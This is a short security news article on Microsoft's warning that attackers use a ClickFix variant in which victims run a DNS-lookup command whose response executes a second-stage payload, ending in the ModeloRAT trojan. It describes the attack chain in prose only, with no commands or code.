Microsoft has warned users that threat actors are leveraging a new variant of the ClickFix technique to deliver malware.
The ClickFix attack method has been increasingly used in the past year by both cybercriminals and state-sponsored threat groups.
The attack involves attackers displaying a fake error message on a compromised or malicious site. The message instructs the target to address the issue by pressing specific keys, then performing additional steps (eg, running a command). By following the attacker’s instructions, the user unknowingly grants elevated permissions, downloads malware, or executes attacker-supplied scripts.
In a recent ClickFix attack observed by Microsoft the attacker asked targets to run a command that executes a custom DNS lookoup.
“The initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver. The output is filtered to extract the ‘Name:’ DNS response, which is executed as the second-stage payload,” Microsoft explained.
This tactic enables the attacker to reach their infrastructure and validate execution of the second-stage payload, increasing their chances of evading detection by blending malicious traffic into regular network traffic.
The second-stage payload downloads and executes a malicious Python script designed for reconnaissance. The final payload is then dropped and a persistence mechanism is deployed.
The final payload is a remote access trojan named ModeloRAT, which enables attackers to collect information about the compromised system and execute other payloads.
While Microsoft has not shared any information on the attacks, Huntress reported recently that a threat actor tracked as KongTuke had been deploying ModeloRAT through a ClickFix variant dubbed CrashFix. The campaign was aimed at corporate environments.
Related: Over 300 Malicious Chrome Extensions Caught Leaking or Stealing User Data
Related: RATs in the Machine: Inside a Pakistan-Linked Three-Pronged Cyber Assault on India
Related: New ‘ZeroDayRAT’ Spyware Kit Enables Total Compromise of iOS, Android Devices
